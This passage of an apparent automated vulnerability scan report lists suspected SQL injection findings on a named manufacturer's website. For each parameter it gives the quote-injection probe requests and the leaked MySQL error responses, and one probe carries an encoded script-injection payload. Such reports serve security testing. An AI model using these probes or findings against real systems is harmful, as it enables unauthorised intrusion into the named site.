Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:53 GMT
Connection: Keep-Alive
Content-Length: 16538

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
1.45. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.1.10.1303147760; __qca=P0-154865017-1303147760079

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:37 GMT
Connection: Keep-Alive
Content-Length: 27688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/favicon.ico''' at line 1)<br>
...[SNIP]...
1.46. http://www.millerwelds.com/financing/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:11 GMT
Connection: Keep-Alive
Content-Length: 13952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/scr' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:13 GMT
Connection: Keep-Alive
Content-Length: 15521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
1.47. http://www.millerwelds.com/financing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /financing'/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:35:18 GMT
Connection: Keep-Alive
Content-Length: 27887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?int_source=/products/accessories/international/&int_medium=bannerad&int_content' at line 1)<br>
...[SNIP]...
1.48. http://www.millerwelds.com/financing/ [int_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_campaign parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_campaign parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:08 GMT
Connection: Keep-Alive
Content-Length: 13992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/?int_source=/products/accessories/international/&int_medium=bannerad' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:09 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
1.49. http://www.millerwelds.com/financing/ [int_content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_content parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_content parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace'&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:52 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace''&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:53 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
1.50. http://www.millerwelds.com/financing/ [int_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_medium parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_medium parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad'&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:33 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad''&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:35 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
1.51. http://www.millerwelds.com/financing/ [int_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_source parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/'&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:17 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/''&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:18 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
1.52. http://www.millerwelds.com/financing/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline&1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:40 GMT
Connection: Keep-Alive
Content-Length: 13917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline&1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:41 GMT
Connection: Keep-Alive
Content-Length: 15803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
1.53. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

